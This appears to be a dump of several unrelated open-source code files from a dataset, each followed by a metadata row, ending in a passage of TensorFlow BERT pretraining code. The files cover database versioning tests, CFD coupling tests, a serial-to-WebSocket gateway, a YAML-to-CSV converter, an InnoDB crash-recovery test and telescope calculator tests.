self.t1 = datetime.utcfromtimestamp(10)
p1 = UserTable(**self.p1)
p3 = UserTable(**self.p3)
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t1
self.session.add_all([p1, p3])
self.session.flush()
self.p1_history.append(self._history(p1, self.t1, 0))
self.p3_history.append(self._history(p3, self.t1, 0))
self.t2 = datetime.utcfromtimestamp(20)
p1.col1 = 'change1'
p2 = UserTable(**self.p2)
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t2
self.session.add_all([p1, p2])
self.session.flush()
self.p1_history.append(self._history(p1, self.t2, 1))
self.p2_history.append(self._history(p2, self.t2, 0))
self.t3 = datetime.utcfromtimestamp(30)
p1.col3 = False
p1.col1 = 'change2'
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t3
self.session.add(p1)
self.session.flush()
self.p1_history.append(self._history(p1, self.t3, 2))
self.t4 = datetime.utcfromtimestamp(40)
p1.col2 = 15
p2.col2 = 12
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = self.t4
self.session.add_all([p1, p2])
self.session.flush()
self.p1_history.append(self._history(p1, self.t4, 3))
self.p2_history.append(self._history(p2, self.t4, 1))
def test_get_single_product_no_change(self):
'''
Performs a query for p3 which has no changes for current time, previous time slice,
a time period that includes t1, and a time period that does not include t1.
'''
conds = [{'product_id': 2546}]
result = get(UserTable, self.session, conds=conds)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(5),
conds=conds,
)
self.assertEqual(len(result), 0)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(15),
conds=conds,
)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=self.t1,
conds=conds,
)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(5),
t2=datetime.utcfromtimestamp(11),
conds=conds,
)
self._assert_result(result, self.p3_history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(15),
conds=conds,
)
self.assertEqual(len(result), 0)
def test_get_single_product_with_change(self):
'''
Performs a query for p1 which has been changed 3 times for current time, previous time
slices, and various time periods.
'''
conds = [{'product_id': 10}]
result = get(UserTable, self.session, conds=conds)
self._assert_result(result, self.p1_history[-1:])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(15), conds=conds)
self._assert_result(result, self.p1_history[:1])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(35),
conds=conds,
)
self._assert_result(result, self.p1_history[2:3])
result = get(
UserTable,
self.session,
t2=datetime.utcfromtimestamp(35),
conds=conds,
)
self._assert_result(result, self.p1_history[:3])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(45),
conds=conds,
)
self._assert_result(result, self.p1_history[1:])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(35),
conds=conds,
)
self._assert_result(result, self.p1_history[1:3])
def test_get_multiple_products(self):
conds = [{'product_id': 10}, {'product_id': 11}]
result = get(UserTable, self.session, conds=conds)
self._assert_result(result, [self.p1_history[-1], self.p2_history[-1]])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(15), conds=conds)
self._assert_result(result, self.p1_history[:1])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(25), conds=conds)
self._assert_result(result, [self.p1_history[1], self.p2_history[0]])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(45),
conds=conds,
)
self._assert_result(result, list(chain(self.p1_history[1:], self.p2_history)))
def test_get_all_products(self):
result = get(UserTable, self.session)
self._assert_result(result, [self.p1_history[-1], self.p2_history[-1], self.p3_history[-1]])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(31))
self._assert_result(result, [self.p1_history[2], self.p2_history[0], self.p3_history[0]])
result = get(UserTable, self.session, t1=datetime.utcfromtimestamp(11))
self._assert_result(result, [self.p1_history[0], self.p3_history[0]])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
t2=datetime.utcfromtimestamp(45),
)
self._assert_result(result, list(chain(self.p1_history[1:], self.p2_history)))
def test_get_products_after_va_id(self):
result = get(
UserTable,
self.session,
va_id=3,
)
self._assert_result(result, [
self.p1_history[1], self.p1_history[2], self.p1_history[3], self.p2_history[1]
])
def test_fields_query(self):
'''
Test specifying fields and make sure dedup happens correctly.
'''
def prune_data(d, fields):
return {k: d[k] for k in fields}
conds = [{'product_id': 10}]
fields = ['col2']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(9),
t2=datetime.utcfromtimestamp(45),
conds=conds,
fields=fields,
)
expected = [self.p1_history[0], self.p1_history[3]]
self._assert_result(result, expected, fields=fields)
fields = ['col1', 'col2']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(9),
t2=datetime.utcfromtimestamp(45),
conds=conds,
fields=fields,
)
self._assert_result(result, self.p1_history, fields=fields)
fields = ['col1']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(9),
t2=datetime.utcfromtimestamp(45),
fields=fields,
)
self._assert_result(
result,
list(chain(self.p1_history[:3], self.p2_history[:1], self.p3_history)),
fields=fields,
)
fields = ['col1', 'col2']
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(11),
conds=conds,
fields=fields,
)
self._assert_result(result, self.p1_history[:1], fields=fields)
fields = ['col1', 'col2']
result = get(
UserTable,
self.session,
conds=conds,
fields=fields,
)
self._assert_result(result, self.p1_history[-1:], fields=fields)
fields = ['col1', 'invalid_col']
result = get(
UserTable,
self.session,
conds=conds,
fields=fields,
)
self.p1_history[-1]['va_data']['invalid_col'] = None
self._assert_result(result, self.p1_history[-1:], fields=fields)
def test_failure_conditions(self):
'''
Pass invalid conds arguments and ensure the query fails.
'''
conds = [{'product_id': 10, 'foo': 15}]
with self.assertRaises(ValueError):
get(UserTable, self.session, t1=datetime.utcfromtimestamp(31), conds=conds)
conds = [{'pid': 10}]
with self.assertRaises(ValueError):
get(UserTable, self.session, t1=datetime.utcfromtimestamp(31), conds=conds)
with self.assertRaises(ValueError):
get(UserTable, self.session, page=-10)
def test_paging_results(self):
self.session.execute('delete from {}'.format(UserTable.__tablename__))
self.session.execute('delete from {}'.format(ArchiveTable.__tablename__))
t = datetime.utcfromtimestamp(10000)
with mock.patch('versionalchemy.models.datetime') as p:
p.now.return_value = t
history = []
self.p1['col2'] = 0
p1 = UserTable(**self.p1)
self.session.add(p1)
self.session.commit()
history.append(self._history(p1, t, self.p1['col2']))
# make 500 changes
for i in range(500):
self.p1['col2'] += 1
self.p1['col3'] = int(i < 250)
self.p1['col1'] = 'foobar' + '1' * ((i + 1) // 10)
[setattr(p1, k, v) for k, v in six.iteritems(self.p1)]
self.session.add(p1)
self.session.commit()
history.append(self._history(p1, t, self.p1['col2']))
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=1,
page_size=1000,
)
self._assert_result(result, history)
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=1,
page_size=100
)
self._assert_result(result, history[:100])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=3,
page_size=100
)
self._assert_result(result, history[200:300])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
page=5,
page_size=100
)
self._assert_result(result, history[400:500])
result = get(
UserTable,
self.session,
t1=datetime.utcfromtimestamp(0),
t2=datetime.utcfromtimestamp(10000000000),
fields=['col1'],
page=1,
page_size=80
)
self._assert_result(result, history[0:80:10], fields=['col1'])
def _assert_result(self, result, expected, fields=None):
self.assertEqual(len(result), len(expected))
for res, exp in zip(result, expected):
res = copy.deepcopy(res)
exp = copy.deepcopy(exp)
self.assertEqual(res['va_id'], exp['va_data']['va_id'])
del res['va_id']
if 'id' in res['va_data']:
del res['va_data']['id']
del res['user_id']
del exp['va_data']['id']
del exp['va_data']['va_id']
if fields is not None:
for k in list(exp['va_data']):
if k not in fields:
del exp['va_data'][k]
self.assertEqual(res, exp)
def _history(self, row, ts, version):
self.assertEqual(row.version(self.session), version)
d = row._to_dict(get_dialect(self.session))
self.assertNotIn('va_id', d)
d['va_id'] = row.va_id
return {
'va_data': d,
'va_updated_at': ts,
'va_deleted': False,
'va_version': version,
'product_id': row.product_id
}
| mit | -9,028,803,835,334,087,000 | 32.501931 | 100 | 0.535093 | false |
Crompulence/cpl-library | examples/sockets/OpenFOAM/OpenFOAM-3.0.1/cpl-socket/tests/stressC-P/test_forces.py | 1 | 5435 | import pytest
import numpy as np
from cplpy import run_test, prepare_config, parametrize_file
import os
import sys
import subprocess
try:
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
except:
"Error: PyFoam package is required to run the tests"
sys.exit()
# -----Forces TESTS-----
# EXPLANATION:
MD_FNAME = "dummyMD_forces.py"
MD_ARGS = MD_FNAME
MD_EXEC = "python"
CFD_FNAME = "test_forces_case"
CFD_ARGS = "-parallel -case " + CFD_FNAME
CFD_EXEC = "CPLIcoFoam"
TEST_TEMPLATE_DIR = os.path.join(os.environ["CPL_PATH"], "test/templates")
TEST_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.fixture()
def prepare_config_fix(tmpdir):
prepare_config(tmpdir, TEST_DIR, MD_FNAME, CFD_FNAME)
def compare_forces(tol, cfd_params, md_fname="md_forces.dat",
openfoam_dir="test_forces_case/2"):
ncx, ncy, ncz = cfd_params["ncx"], cfd_params["ncy"], cfd_params["ncz"]
Lx, Ly, Lz = cfd_params["lx"], cfd_params["ly"], cfd_params["lz"]
s_xy = ParsedParameterFile(openfoam_dir + "/sigmaxy")["internalField"]
s_yz = ParsedParameterFile(openfoam_dir + "/sigmayz")["internalField"]
s_yy = ParsedParameterFile(openfoam_dir + "/sigmayy")["internalField"]
cell_cx = ParsedParameterFile(openfoam_dir + "/ccx")["internalField"]
cell_cy = ParsedParameterFile(openfoam_dir + "/ccy")["internalField"]
cell_cz = ParsedParameterFile(openfoam_dir + "/ccz")["internalField"]
openfoam_cells = {}
cell_no = 0
for cell_no in xrange(0, len(s_xy)):
cell_coord = (float(cell_cx[cell_no]), float(cell_cy[cell_no]), float(cell_cz[cell_no]))
# Openfoam output cell centres with 6 decimal figures
k = "{0:.5f}".format(cell_coord[0]), "{0:.5f}".format(cell_coord[1]),\
"{0:.5f}".format(cell_coord[2])
openfoam_cells[k] = np.array([float(s_xy[cell_no]), float(s_yy[cell_no]),
float(s_yz[cell_no])])
# Line format of dummy md forces file -- > x y z sxy syy szy
with open(md_fname, "r") as cfd_file:
cfd_lines = cfd_file.readlines()
md_lines = [l[:-1].split(" ") for l in cfd_lines]
md_cells = {}
for l in md_lines:
k = "{0:.5f}".format(float(l[0])), "{0:.5f}".format(float(l[1])), "{0:.5f}".format(float(l[2]))
md_cells[k] = np.array([float(l[3]), float(l[4]), float(l[5])])
for k in md_cells.keys():
try:
diff_forces = abs(md_cells[k] - openfoam_cells[k])
if (np.any(diff_forces > tol)):
print md_cells[k]
print openfoam_cells[k]
assert False
except KeyError:
print "Cell not found: cell " + k
assert False
# -----FORCES TESTS-----
# EXPLANATION: See README-test located in this folder.
@pytest.mark.parametrize("cfdprocs, mdprocs, cells, err_msg", [
((3, 3, 3), (3, 3, 3), (15, 15, 15), ""),
((1, 2, 1), (3, 2, 2), (30, 36, 24), ""),
((4, 3, 3), (4, 3, 3), (20, 15, 27), ""),
((3, 3, 3), (3, 3, 3), (30, 15, 21), "")])
def test_forcesC2P(prepare_config_fix, cfdprocs, mdprocs, cells, err_msg):
MD_PARAMS = {"lx": 300.0, "ly": 300.0, "lz": 300.0}
MD_PARAMS["npx"], MD_PARAMS["npy"], MD_PARAMS["npz"] = mdprocs
CFD_PARAMS = {"lx": 300.0, "ly": 300.0, "lz": 300.0}
CFD_PARAMS["npx"], CFD_PARAMS["npy"], CFD_PARAMS["npz"] = cfdprocs
CFD_PARAMS["ncx"], CFD_PARAMS["ncy"], CFD_PARAMS["ncz"] = cells
# Needed for decomposParDict
CFD_PARAMS["nprocs"] = cfdprocs[0]*cfdprocs[1]*cfdprocs[2]
CONFIG_PARAMS = {"cfd_bcx": 1, "cfd_bcy": 0, "cfd_bcz": 0,
"olap_xlo": 1, "olap_xhi": cells[0],
"olap_ylo": 1, "olap_yhi": 5,
"olap_zlo": 1, "olap_zhi": cells[2],
"cnst_xlo": 1, "cnst_xhi": cells[0],
"cnst_ylo": 3, "cnst_yhi": 5,
"cnst_zlo": 1, "cnst_zhi": cells[2],
"tstep_ratio": 1, }
# Parametrize OpenFOAM files
mesh_file = os.path.join(CFD_FNAME+"/", "constant/polyMesh/blockMeshDict")
parametrize_file(mesh_file, mesh_file, CFD_PARAMS)
control_dict_file = os.path.join(CFD_FNAME+"/", "system/decomposeParDict")
parametrize_file(control_dict_file, control_dict_file, CFD_PARAMS)
try:
subprocess.check_output(["blockMesh", "-case", CFD_FNAME])
except:
assert False
try:
subprocess.check_output(["decomposePar", "-case", CFD_FNAME])
except:
assert False
correct = run_test(TEST_TEMPLATE_DIR, CONFIG_PARAMS, MD_EXEC, MD_FNAME, MD_ARGS,
CFD_EXEC, CFD_FNAME, CFD_ARGS, MD_PARAMS, CFD_PARAMS, err_msg, True)
if correct:
# Reconstruct the fields from processor directories.
try:
subprocess.check_output(["reconstructPar", "-case", CFD_FNAME])
except:
assert False
# Reconstruct the fields from processor directories.
try:
subprocess.check_output(["writeCellCentres", "-case", CFD_FNAME])
except:
assert False
# Calculate stress components using ...
try:
subprocess.check_output(["stressComponents", "-case", CFD_FNAME])
except:
assert False
compare_forces(1e-6, CFD_PARAMS)
| gpl-3.0 | -8,364,304,484,368,054,000 | 37.274648 | 103 | 0.570377 | false |
danielfaust/AutobahnPython | examples/serial2ws/serial2ws.py | 1 | 4492 | ###############################################################################
##
## Copyright 2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys, time
if sys.platform == 'win32':
## on windows, we need to use the following reactor for serial support
## http://twistedmatrix.com/trac/ticket/3802
##
from twisted.internet import win32eventreactor
win32eventreactor.install()
from twisted.internet import reactor
print "Using Twisted reactor", reactor.__class__
print
from twisted.python import usage, log
from twisted.protocols.basic import LineReceiver
from twisted.internet.serialport import SerialPort
from twisted.web.server import Site
from twisted.web.static import File
from autobahn.websocket import listenWS
from autobahn.wamp import WampServerFactory, WampServerProtocol, exportRpc
class Serial2WsOptions(usage.Options):
optParameters = [
['baudrate', 'b', 9600, 'Serial baudrate'],
['port', 'p', 3, 'Serial port to use'],
['webport', 'w', 8080, 'Web port to use for embedded Web server'],
['wsurl', 's', "ws://localhost:9000", 'WebSocket port to use for embedded WebSocket server']
]
## MCU protocol
##
class McuProtocol(LineReceiver):
## need a reference to our WS-MCU gateway factory to dispatch PubSub events
##
def __init__(self, wsMcuFactory):
self.wsMcuFactory = wsMcuFactory
## this method is exported as RPC and can be called by connected clients
##
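## e.g. a connected WAMP client could invoke it roughly as follows (illustrative
## sketch; the client-side call syntax is an assumption, the RPC URI is derived
## from the registerForRpc() prefix used below):
##   session.call("http://example.com/mcu-control#control-led", True)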
@exportRpc("control-led")
def controlLed(self, status):
if status:
print "turn on LED"
self.transport.write('1')
else:
print "turn off LED"
self.transport.write('0')
def connectionMade(self):
log.msg('Serial port connected.')
def lineReceived(self, line):
try:
## parse data received from MCU
##
data = [int(x) for x in line.split()]
## construct PubSub event from raw data
##
evt = {'id': data[0], 'value': data[1]}
## publish event to all clients subscribed to topic
##
self.wsMcuFactory._dispatchEvent("http://example.com/mcu#analog-value", evt)
log.msg("Analog value: %s" % str(evt));
except ValueError:
log.err('Unable to parse value %s' % line)
## WS-MCU protocol
##
class WsMcuProtocol(WampServerProtocol):
def onSessionOpen(self):
## register topic prefix under which we will publish MCU measurements
##
self.registerForPubSub("http://example.com/mcu#", True)
## register methods for RPC
##
self.registerForRpc(self.factory.mcuProtocol, "http://example.com/mcu-control#")
## WS-MCU factory
##
class WsMcuFactory(WampServerFactory):
protocol = WsMcuProtocol
def __init__(self, url):
WampServerFactory.__init__(self, url)
self.mcuProtocol = McuProtocol(self)
if __name__ == '__main__':
## parse options
##
o = Serial2WsOptions()
try:
o.parseOptions()
except usage.UsageError, errortext:
print '%s %s' % (sys.argv[0], errortext)
print 'Try %s --help for usage details' % sys.argv[0]
sys.exit(1)
baudrate = int(o.opts['baudrate'])
port = int(o.opts['port'])
webport = int(o.opts['webport'])
wsurl = o.opts['wsurl']
## start Twisted log system
##
log.startLogging(sys.stdout)
## create Serial2Ws gateway factory
##
wsMcuFactory = WsMcuFactory(wsurl)
listenWS(wsMcuFactory)
## create serial port and serial port protocol
##
log.msg('About to open serial port %d [%d baud] ..' % (port, baudrate))
serialPort = SerialPort(wsMcuFactory.mcuProtocol, port, reactor, baudrate = baudrate)
## create embedded web server for static files
##
webdir = File(".")
web = Site(webdir)
reactor.listenTCP(webport, web)
## start Twisted reactor ..
##
reactor.run()
| apache-2.0 | -472,536,809,727,559,940 | 26.900621 | 98 | 0.637133 | false |
benformosa/Toolbox | yaml2csv.py | 1 | 1493 | #!/usr/bin/env python2
import argparse
import csv
import itertools
import sys
import yaml
def main():
parser = argparse.ArgumentParser(
description='Convert a YAML mapping or sequence of mappings to a CSV'
)
parser.add_argument(
'file',
type=argparse.FileType('r'),
default=sys.stdin,
help='YAML file to process',
)
parser.add_argument(
'-s', '--sort-headers',
action='store_true',
help='Sort headers',
)
parser.add_argument(
'-e', '--headers',
type=str,
default=None,
help='Comma-separated list of headers',
)
args = parser.parse_args()
data = yaml.safe_load(args.file)
if type(data) is dict:
data = [data]
if type(data) is list:
if not args.headers:
headers = set(flatten([d.keys() for d in data]))
else:
headers = args.headers.split(',')
if args.sort_headers:
headers = sorted(headers)
writer = csv.DictWriter(sys.stdout, fieldnames=headers)
writer.writeheader()
writer.writerows(data)
else:
print("Error: data is not a YAML sequence or mapping")
sys.exit(1)
def flatten(list_of_lists):
"""Flatten one level of nesting
From itertools docs
"""
return list(itertools.chain.from_iterable(list_of_lists))
if __name__ == '__main__':
main()
| unlicense | 8,178,630,155,088,478,000 | 24.741379 | 81 | 0.553918 | false |
jonzobrist/Percona-Server-5.1 | kewpie/percona_tests/innodbCrash/innodbCrash2_test.py | 1 | 5311 | #! /usr/bin/env python
# -*- mode: python; indent-tabs-mode: nil; -*-
# vim:expandtab:shiftwidth=2:tabstop=2:smarttab:
#
# Copyright (C) 2011 Patrick Crews
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import signal
import threading
import time
from percona_tests.innodbCrash.innodbCrashTestCase import innodbCrashTestCase
from percona_tests.innodbCrash import suite_config
server_requirements = suite_config.server_requirements
server_requests = suite_config.server_requests
servers = suite_config.servers
test_executor = suite_config.test_executor
class Worker(threading.Thread):
def __init__( self
, xid
, thread_desc
, time_delay
, test_executor
, server
, logging):
threading.Thread.__init__(self)
self.server = server
self.xid = xid
self.desc = thread_desc
self.time_delay = time_delay
self.test_executor = test_executor
self.logging = logging
self.start()
def finish(self):
return
def run(self):
try:
self.logging.test_debug( "Will crash after:%d seconds" %(self.time_delay))
time.sleep(self.time_delay)
pid = None
timeout = self.time_delay*6
decrement = .25
while not pid and timeout:
pid = self.server.get_pid()
time.sleep(decrement)
timeout -= decrement
self.logging.test_debug( "Crashing server: port: %s, pid: %s" %(self.server.master_port, pid))
try:
os.kill(int(self.server.pid), signal.SIGKILL)
self.logging.test_debug( "Killed server pid: %s" %pid)
except OSError, e:
self.logging.test_debug( "Didn't kill server pid: %s" %pid)
self.logging.test_debug( e)
except Exception, e:
print "caught (%s)" % e
finally:
self.finish()
class basicTest(innodbCrashTestCase):
""" This test case creates a master-slave pair
then generates a randgen load against the master
The master server is killed after %kill_db_after seconds
and restarted. We restart the slave, then ensure
the master and slave have matching table checksums once
they are synced and the test load is stopped
"""
def test_crash(self):
self.initialize(test_executor, servers, suite_config)
workers = []
# create our table
self.test_bed_cmd = "./gendata.pl --spec=conf/percona/percona_no_blob.zz "
self.create_test_bed()
# generate our workload via randgen
test_seq = [ "./gentest.pl"
, "--grammar=conf/percona/translog_concurrent1.yy"
, "--queries=%d" %(self.randgen_queries_per_thread)
, "--threads=%d" %(self.randgen_threads)
, "--sqltrace"
, "--debug"
, "--seed=%s" %(self.randgen_seed)
]
while self.crashes:
self.logging.test_debug( "Crashes remaining: %d" %(self.crashes))
self.crashes -= 1
worker = Worker( 1
, 'time_delay_kill_thread'
, self.kill_db_after
, self.test_executor
, self.master_server
, self.logging
)
workers.append(worker)
randgen_process = self.get_randgen_process(test_seq, self.test_executor, self.master_server)
#if not self.master_server.ping(quiet=True) and (randgen_process.poll() is None):
# Our server is dead, but randgen is running, we kill it to speed up testing
#randgen_process.send_signal(signal.SIGINT)
for w in workers:
w.join()
time.sleep(2)
while not randgen_process.poll():
randgen_process.send_signal(signal.SIGINT)
retcode = self.master_server.start()
timeout = 300
decrement = 1
while timeout and not self.master_server.ping(quiet=True):
time.sleep(decrement)
timeout -= decrement
self.slave_server.slave_stop()
self.slave_server.slave_start()
self.master_server.wait_sync_with_slaves([self.slave_server],timeout=60)
result = self.check_slaves_by_checksum(self.master_server,[self.slave_server])
self.assertEqual(result,None,msg=result)
| bsd-3-clause | -8,189,090,280,763,392,000 | 36.935714 | 106 | 0.585577 | false |
eaobservatory/hedwig | test/test_jcmt_calc_s2.py | 1 | 4087 | # Copyright (C) 2017 East Asian Observatory
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful,but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,51 Franklin
# Street, Fifth Floor, Boston, MA 02110-1301, USA
from __future__ import absolute_import, division, print_function, \
unicode_literals
from hedwig.facility.jcmt.calculator_scuba2 import SCUBA2Calculator
from .base_calculator import CalculatorTestCase
expect = {
SCUBA2Calculator.CALC_TIME: {
2: {
'input': 'pos pos_type tau map samp pix850 pix450 wl rms',
'output': 'time',
},
1: {
'input': 'pos pos_type tau map mf pix850 pix450 wl rms',
'output': 'time',
},
},
SCUBA2Calculator.CALC_RMS: {
2: {
'input': 'pos pos_type tau map samp pix850 pix450 time',
'output': 'rms_850 rms_450',
},
1: {
'input': 'pos pos_type tau map mf pix850 pix450 time',
'output': 'rms_850 rms_450',
},
},
}
conversions = [
('time w/ mf', SCUBA2Calculator.CALC_TIME, {
1: {
'map': 'daisy',
'pos': 65.43,
'pos_type': 'dec',
'tau': 0.040,
'pix850': None,
'pix450': None,
'mf': True,
'wl': 850,
'rms': 1.5,
},
2: {
'map': 'daisy',
'pos': 65.43,
'pos_type': 'dec',
'tau': 0.040,
'samp': 'mf',
'pix850': None,
'pix450': None,
'wl': 850,
'rms': 1.5,
}
}),
('time w/o mf', SCUBA2Calculator.CALC_TIME, {
1: {
'map': 'daisy',
'pos': 22.22,
'pos_type': 'zen',
'tau': 0.080,
'pix850': 8,
'pix450': 4,
'mf': False,
'wl': 850,
'rms': 1.5,
},
2: {
'map': 'daisy',
'pos': 22.22,
'pos_type': 'zen',
'tau': 0.080,
'samp': 'custom',
'pix850': 8,
'pix450': 4,
'wl': 850,
'rms': 1.5,
},
}),
('rms w/ mf', SCUBA2Calculator.CALC_RMS, {
1: {
'map': 'pong1800',
'pos': 1.2345,
'pos_type': 'am',
'tau': 0.123,
'pix850': None,
'pix450': None,
'mf': True,
'time': 4.5,
},
2: {
'map': 'pong1800',
'pos': 1.2345,
'pos_type': 'am',
'tau': 0.123,
'samp': 'mf',
'pix850': None,
'pix450': None,
'time': 4.5,
},
}),
('rms w/o mf', SCUBA2Calculator.CALC_RMS, {
1: {
'map': 'pong900',
'pos': 72.25,
'pos_type': 'el',
'tau': 0.0987,
'pix850': 13,
'pix450': 8,
'mf': False,
'time': 2.76,
},
2: {
'map': 'pong900',
'pos': 72.25,
'pos_type': 'el',
'tau': 0.0987,
'samp': 'custom',
'pix850': 13,
'pix450': 8,
'time': 2.76,
},
}),
]
class JCMTS2CalcTestCase(CalculatorTestCase):
calculator_class = SCUBA2Calculator
def test_basic(self):
self._test_basic(expect)
def test_convert_version(self):
self._test_convert_version(conversions)
| gpl-3.0 | -2,924,925,457,265,718,000 | 25.031847 | 79 | 0.457793 | false |
tombstone/models | official/nlp/bert/run_pretraining.py | 1 | 7381 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Run masked LM/next sentence pre-training for BERT in TF 2.x."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from absl import logging
import gin
import tensorflow as tf
from official.modeling import performance
from official.nlp import optimization
from official.nlp.bert import bert_models
from official.nlp.bert import common_flags
from official.nlp.bert import configs
from official.nlp.bert import input_pipeline
from official.nlp.bert import model_training_utils
from official.utils.misc import distribution_utils
flags.DEFINE_string('input_files', None,
'File path to retrieve training data for pre-training.')
# Model training specific flags.
flags.DEFINE_integer(
'max_seq_length', 128,
'The maximum total input sequence length after WordPiece tokenization. '
'Sequences longer than this will be truncated, and sequences shorter '
'than this will be padded.')
flags.DEFINE_integer('max_predictions_per_seq', 20,
'Maximum predictions per sequence_output.')
flags.DEFINE_integer('train_batch_size', 32, 'Total batch size for training.')
flags.DEFINE_integer('num_steps_per_epoch', 1000,
'Total number of training steps to run per epoch.')
flags.DEFINE_float('warmup_steps', 10000,
'Warmup steps for Adam weight decay optimizer.')
flags.DEFINE_bool('use_next_sentence_label', True,
'Whether to use next sentence label to compute final loss.')
flags.DEFINE_integer('train_summary_interval', 0, 'Step interval for training '
'summaries. If the value is a negative number, '
'then training summaries are not enabled.')
common_flags.define_common_bert_flags()
FLAGS = flags.FLAGS
def get_pretrain_dataset_fn(input_file_pattern, seq_length,
max_predictions_per_seq, global_batch_size,
use_next_sentence_label=True):
"""Returns input dataset from input file string."""
def _dataset_fn(ctx=None):
"""Returns tf.data.Dataset for distributed BERT pretraining."""
input_patterns = input_file_pattern.split(',')
batch_size = ctx.get_per_replica_batch_size(global_batch_size)
train_dataset = input_pipeline.create_pretrain_dataset(
input_patterns,
seq_length,
max_predictions_per_seq,
batch_size,
is_training=True,
input_pipeline_context=ctx,
use_next_sentence_label=use_next_sentence_label)
return train_dataset
return _dataset_fn
def get_loss_fn():
"""Returns loss function for BERT pretraining."""
def _bert_pretrain_loss_fn(unused_labels, losses, **unused_args):
return tf.reduce_mean(losses)
return _bert_pretrain_loss_fn
def run_customized_training(strategy,
bert_config,
init_checkpoint,
max_seq_length,
max_predictions_per_seq,
model_dir,
steps_per_epoch,
steps_per_loop,
epochs,
initial_lr,
warmup_steps,
end_lr,
optimizer_type,
input_files,
train_batch_size,
use_next_sentence_label=True,
train_summary_interval=0,
custom_callbacks=None):
"""Run BERT pretrain model training using low-level API."""
train_input_fn = get_pretrain_dataset_fn(input_files, max_seq_length,
max_predictions_per_seq,
train_batch_size,
use_next_sentence_label)
def _get_pretrain_model():
"""Gets a pretraining model."""
pretrain_model, core_model = bert_models.pretrain_model(
bert_config, max_seq_length, max_predictions_per_seq,
use_next_sentence_label=use_next_sentence_label)
optimizer = optimization.create_optimizer(
initial_lr, steps_per_epoch * epochs, warmup_steps,
end_lr, optimizer_type)
pretrain_model.optimizer = performance.configure_optimizer(
optimizer,
use_float16=common_flags.use_float16(),
use_graph_rewrite=common_flags.use_graph_rewrite())
return pretrain_model, core_model
trained_model = model_training_utils.run_customized_training_loop(
strategy=strategy,
model_fn=_get_pretrain_model,
loss_fn=get_loss_fn(),
scale_loss=FLAGS.scale_loss,
model_dir=model_dir,
init_checkpoint=init_checkpoint,
train_input_fn=train_input_fn,
steps_per_epoch=steps_per_epoch,
steps_per_loop=steps_per_loop,
epochs=epochs,
sub_model_export_name='pretrained/bert_model',
train_summary_interval=train_summary_interval,
custom_callbacks=custom_callbacks)
return trained_model
def run_bert_pretrain(strategy, custom_callbacks=None):
"""Runs BERT pre-training."""
bert_config = configs.BertConfig.from_json_file(FLAGS.bert_config_file)
if not strategy:
